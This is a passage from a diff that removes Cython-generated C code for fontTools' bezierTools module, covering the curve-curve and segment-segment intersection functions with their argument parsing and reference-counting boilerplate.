__Pyx_PyList_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1397, __pyx_L5_error) - #endif - if (__pyx_t_5 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_5); __Pyx_INCREF(__pyx_t_3); __pyx_t_5++; if (unlikely((0 < 0))) __PYX_ERR(0, 1397, __pyx_L5_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_5); __pyx_t_5++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1397, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1397, __pyx_L5_error) - #endif - if (__pyx_t_5 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_5); __Pyx_INCREF(__pyx_t_3); __pyx_t_5++; if (unlikely((0 < 0))) __PYX_ERR(0, 1397, __pyx_L5_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_5); __pyx_t_5++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1397, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - } - } else { - __pyx_t_3 = __pyx_t_6(__pyx_t_2); - if (unlikely(!__pyx_t_3)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1397, __pyx_L5_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_3); - } - __Pyx_XDECREF_SET(__pyx_8genexpr7__pyx_v_ts, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1396 - * intersection_ts = _curve_curve_intersections_t(curve1, curve2) - * return [ - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) # <<<<<<<<<<<<<< - * for ts in intersection_ts - * ] - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_segmentPointAtT); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = __Pyx_GetItemInt(__pyx_8genexpr7__pyx_v_ts, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_11 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_11)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_11); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_11, __pyx_v_curve1, __pyx_t_10}; - __pyx_t_8 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_pt, __pyx_t_8) < 0) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_GetItemInt(__pyx_8genexpr7__pyx_v_ts, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_8); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_t1, __pyx_t_8) < 0) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_GetItemInt(__pyx_8genexpr7__pyx_v_ts, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_8); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_t2, __pyx_t_8) < 0) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_empty_tuple, __pyx_t_7); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_8))) __PYX_ERR(0, 1395, __pyx_L5_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":1397 - * return [ - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) - * for ts in intersection_ts # <<<<<<<<<<<<<< - * ] - * - */ - } - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF(__pyx_8genexpr7__pyx_v_ts); __pyx_8genexpr7__pyx_v_ts = 0; - goto __pyx_L9_exit_scope; - __pyx_L5_error:; - __Pyx_XDECREF(__pyx_8genexpr7__pyx_v_ts); __pyx_8genexpr7__pyx_v_ts = 0; - goto __pyx_L1_error; - __pyx_L9_exit_scope:; - } /* exit inner scope */ - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1373 - * - * - * def curveCurveIntersections(curve1, curve2): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a curve. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("fontTools.misc.bezierTools.curveCurveIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_intersection_ts); - __Pyx_XDECREF(__pyx_8genexpr7__pyx_v_ts); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1401 - * - * - * def segmentSegmentIntersections(seg1, seg2): # <<<<<<<<<<<<<< - * """Finds intersections between two segments. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections, "segmentSegmentIntersections(seg1, seg2)\nFinds intersections between two segments.\n\n Args:\n seg1: List of coordinates of the first segment as 2D tuples.\n seg2: List of coordinates of the second segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve1 = [ (10,100), (90,30), (40,140), (220,220) ]\n >>> curve2 = [ (5,150), (180,20), (80,250), (210,190) ]\n >>> intersections = segmentSegmentIntersections(curve1, curve2)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (81.7831487395506, 109.88904552375288)\n >>> curve3 = [ (100, 240), (30, 60), (210, 230), (160, 30) ]\n >>> line = [ (25, 260), (230, 20) ]\n >>> intersections = segmentSegmentIntersections(curve3, line)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (84.9000930760723, 189.87306176459828)\n\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections = {"segmentSegmentIntersections", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_seg1 = 0; - PyObject *__pyx_v_seg2 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("segmentSegmentIntersections (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_seg1,&__pyx_n_s_seg2,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_seg1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1401, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_seg2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1401, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("segmentSegmentIntersections", 1, 2, 2, 1); __PYX_ERR(0, 1401, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "segmentSegmentIntersections") < 0)) __PYX_ERR(0, 1401, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_seg1 = values[0]; - __pyx_v_seg2 = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("segmentSegmentIntersections", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1401, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.segmentSegmentIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections(__pyx_self, __pyx_v_seg1, __pyx_v_seg2); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_seg1, PyObject *__pyx_v_seg2) { - int __pyx_v_swapped; - PyObject *__pyx_v_intersections = NULL; - PyObject *__pyx_8genexpr8__pyx_v_i = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - Py_ssize_t __pyx_t_2; - int __pyx_t_3; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - int __pyx_t_9; - int __pyx_t_10; - PyObject *__pyx_t_11 = NULL; - PyObject *(*__pyx_t_12)(PyObject *); - PyObject *__pyx_t_13 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("segmentSegmentIntersections", 0); - __Pyx_INCREF(__pyx_v_seg1); - __Pyx_INCREF(__pyx_v_seg2); - - /* "fontTools/misc/bezierTools.py":1431 - * """ - * # Arrange by degree - * swapped = False # <<<<<<<<<<<<<< - * if len(seg2) > len(seg1): - * seg2, seg1 = seg1, seg2 - */ - __pyx_v_swapped = 0; - - /* "fontTools/misc/bezierTools.py":1432 - * # Arrange by degree - * swapped = False - * if len(seg2) > len(seg1): # <<<<<<<<<<<<<< - * seg2, seg1 = seg1, seg2 - * swapped = True - */ - __pyx_t_1 = PyObject_Length(__pyx_v_seg2); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1432, __pyx_L1_error) - __pyx_t_2 = PyObject_Length(__pyx_v_seg1); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1432, __pyx_L1_error) - __pyx_t_3 = (__pyx_t_1 > __pyx_t_2); - if (__pyx_t_3) { - - /* "fontTools/misc/bezierTools.py":1433 - * swapped = False - * if len(seg2) > len(seg1): - * seg2, seg1 = seg1, seg2 # <<<<<<<<<<<<<< - * swapped = True - * if len(seg1) > 2: - */ - __pyx_t_4 = __pyx_v_seg1; - __pyx_t_5 = __pyx_v_seg2; - __pyx_v_seg2 = __pyx_t_4; - __pyx_t_4 = 0; - __pyx_v_seg1 = __pyx_t_5; - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1434 - * if len(seg2) > len(seg1): - * seg2, seg1 = seg1, seg2 - * swapped = True # <<<<<<<<<<<<<< - * if len(seg1) > 2: - * if len(seg2) > 2: - */ - __pyx_v_swapped = 1; - - /* "fontTools/misc/bezierTools.py":1432 - * # Arrange by degree - * swapped = False - * if len(seg2) > len(seg1): # <<<<<<<<<<<<<< - * seg2, seg1 = seg1, seg2 - * swapped = True - */ - } - - /* "fontTools/misc/bezierTools.py":1435 - * seg2, seg1 = seg1, seg2 - * swapped = True - * if len(seg1) > 2: # <<<<<<<<<<<<<< - * if len(seg2) > 2: - * intersections = curveCurveIntersections(seg1, seg2) - */ - __pyx_t_2 = PyObject_Length(__pyx_v_seg1); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1435, __pyx_L1_error) - __pyx_t_3 = (__pyx_t_2 > 2); - if (__pyx_t_3) { - - /* "fontTools/misc/bezierTools.py":1436 - * swapped = True - * if len(seg1) > 2: - * if len(seg2) > 2: # <<<<<<<<<<<<<< - * intersections = curveCurveIntersections(seg1, seg2) - * else: - */ - __pyx_t_2 = PyObject_Length(__pyx_v_seg2); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1436, __pyx_L1_error) - __pyx_t_3 = (__pyx_t_2 > 2); - if (__pyx_t_3) { - - /* "fontTools/misc/bezierTools.py":1437 - * if len(seg1) > 2: - * if len(seg2) > 2: - * intersections = curveCurveIntersections(seg1, seg2) # <<<<<<<<<<<<<< - * else: - * intersections = curveLineIntersections(seg1, seg2) - */ - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_curveCurveIntersections); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1437, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = NULL; - __pyx_t_9 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_7))) { - __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_7); - if (likely(__pyx_t_8)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_7, function); - __pyx_t_9 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_8, __pyx_v_seg1, __pyx_v_seg2}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_9, 2+__pyx_t_9); - __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1437, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - } - __pyx_v_intersections = __pyx_t_6; - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":1436 - * swapped = True - * if len(seg1) > 2: - * if len(seg2) > 2: # <<<<<<<<<<<<<< - * intersections = curveCurveIntersections(seg1, seg2) - * else: - */ - goto __pyx_L5; - } - - /* "fontTools/misc/bezierTools.py":1439 - * intersections = curveCurveIntersections(seg1, seg2) - * else: - * intersections = curveLineIntersections(seg1, seg2) # <<<<<<<<<<<<<< - * elif len(seg1) == 2 and len(seg2) == 2: - * intersections = lineLineIntersections(*seg1, *seg2) - */ - /*else*/ { - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_curveLineIntersections); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1439, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = NULL; - __pyx_t_9 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_7))) { - __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_7); - if (likely(__pyx_t_8)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_7, function); - __pyx_t_9 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_8, __pyx_v_seg1, __pyx_v_seg2}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_9, 2+__pyx_t_9); - __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1439, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - } - __pyx_v_intersections = __pyx_t_6; - __pyx_t_6 = 0; - } - __pyx_L5:; - - /* "fontTools/misc/bezierTools.py":1435 - * seg2, seg1 = seg1, seg2 - * swapped = True - * if len(seg1) > 2: # <<<<<<<<<<<<<< - * if len(seg2) > 2: - * intersections = curveCurveIntersections(seg1, seg2) - */ - goto __pyx_L4; - } - - /* "fontTools/misc/bezierTools.py":1440 - * else: - * intersections = curveLineIntersections(seg1, seg2) - * elif len(seg1) == 2 and len(seg2) == 2: # <<<<<<<<<<<<<< - * intersections = lineLineIntersections(*seg1, *seg2) - * else: - */ - __pyx_t_2 = PyObject_Length(__pyx_v_seg1); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1440, __pyx_L1_error) - __pyx_t_10 = (__pyx_t_2 == 2); - if (__pyx_t_10) { - } else { - __pyx_t_3 = __pyx_t_10; - goto __pyx_L6_bool_binop_done; - } - __pyx_t_2 = PyObject_Length(__pyx_v_seg2); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1440, __pyx_L1_error) - __pyx_t_10 = (__pyx_t_2 == 2); - __pyx_t_3 = __pyx_t_10; - __pyx_L6_bool_binop_done:; - if (likely(__pyx_t_3)) { - - /* "fontTools/misc/bezierTools.py":1441 - * intersections = curveLineIntersections(seg1, seg2) - * elif len(seg1) == 2 and len(seg2) == 2: - * intersections = lineLineIntersections(*seg1, *seg2) # <<<<<<<<<<<<<< - * else: - * raise ValueError("Couldn't work out which intersection function to use") - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_lineLineIntersections); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_7 = __Pyx_PySequence_Tuple(__pyx_v_seg1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = __Pyx_PySequence_Tuple(__pyx_v_seg2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_11 = PyNumber_Add(__pyx_t_7, __pyx_t_8); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_t_11, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - __pyx_v_intersections = __pyx_t_8; - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":1440 - * else: - * intersections = curveLineIntersections(seg1, seg2) - * elif len(seg1) == 2 and len(seg2) == 2: # <<<<<<<<<<<<<< - * intersections = lineLineIntersections(*seg1, *seg2) - * else: - */ - goto __pyx_L4; - } - - /* "fontTools/misc/bezierTools.py":1443 - * intersections = lineLineIntersections(*seg1, *seg2) - * else: - * raise ValueError("Couldn't work out which intersection function to use") # <<<<<<<<<<<<<< - * if not swapped: - * return intersections - */ - /*else*/ { - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__8, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1443, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_Raise(__pyx_t_8, 0, 0, 0); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __PYX_ERR(0, 1443, __pyx_L1_error) - } - __pyx_L4:; - - /* "fontTools/misc/bezierTools.py":1444 - * else: - * raise ValueError("Couldn't work out which intersection function to use") - * if not swapped: # <<<<<<<<<<<<<< - * return intersections - * return [Intersection(pt=i.pt, t1=i.t2, t2=i.t1) for i in intersections] - */ - __pyx_t_3 = (!__pyx_v_swapped); - if (__pyx_t_3) { - - /* "fontTools/misc/bezierTools.py":1445 - * raise ValueError("Couldn't work out which intersection function to use") - * if not swapped: - * return intersections # <<<<<<<<<<<<<< - * return [Intersection(pt=i.pt, t1=i.t2, t2=i.t1) for i in intersections] - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_intersections); - __pyx_r = __pyx_v_intersections; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1444 - * else: - * raise ValueError("Couldn't work out which intersection function to use") - * if not swapped: # <<<<<<<<<<<<<< - * return intersections - * return [Intersection(pt=i.pt, t1=i.t2, t2=i.t1) for i in intersections] - */ - } - - /* "fontTools/misc/bezierTools.py":1446 - * if not swapped: - * return intersections - * return [Intersection(pt=i.pt, t1=i.t2, t2=i.t1) for i in intersections] # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - { /* enter inner scope */ - __pyx_t_8 = PyList_New(0); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_8); - if (likely(PyList_CheckExact(__pyx_v_intersections)) || PyTuple_CheckExact(__pyx_v_intersections)) { - __pyx_t_11 = __pyx_v_intersections; __Pyx_INCREF(__pyx_t_11); - __pyx_t_2 = 0; - __pyx_t_12 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_11 = PyObject_GetIter(__pyx_v_intersections); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_11); - __pyx_t_12 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_11); if (unlikely(!__pyx_t_12)) __PYX_ERR(0, 1446, __pyx_L11_error) - } - for (;;) { - if (likely(!__pyx_t_12)) { - if (likely(PyList_CheckExact(__pyx_t_11))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_11); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1446, __pyx_L11_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_6 = PyList_GET_ITEM(__pyx_t_11, __pyx_t_2); __Pyx_INCREF(__pyx_t_6); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1446, __pyx_L11_error) - #else - __pyx_t_6 = __Pyx_PySequence_ITEM(__pyx_t_11, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_11); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1446, __pyx_L11_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_6 = PyTuple_GET_ITEM(__pyx_t_11, __pyx_t_2); __Pyx_INCREF(__pyx_t_6); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1446, __pyx_L11_error) - #else - __pyx_t_6 = __Pyx_PySequence_ITEM(__pyx_t_11, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - } - } else { - __pyx_t_6 = __pyx_t_12(__pyx_t_11); - if (unlikely(!__pyx_t_6)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1446, __pyx_L11_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_6); - } - __Pyx_XDECREF_SET(__pyx_8genexpr8__pyx_v_i, __pyx_t_6); - __pyx_t_6 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1446, __pyx_L11_error) - 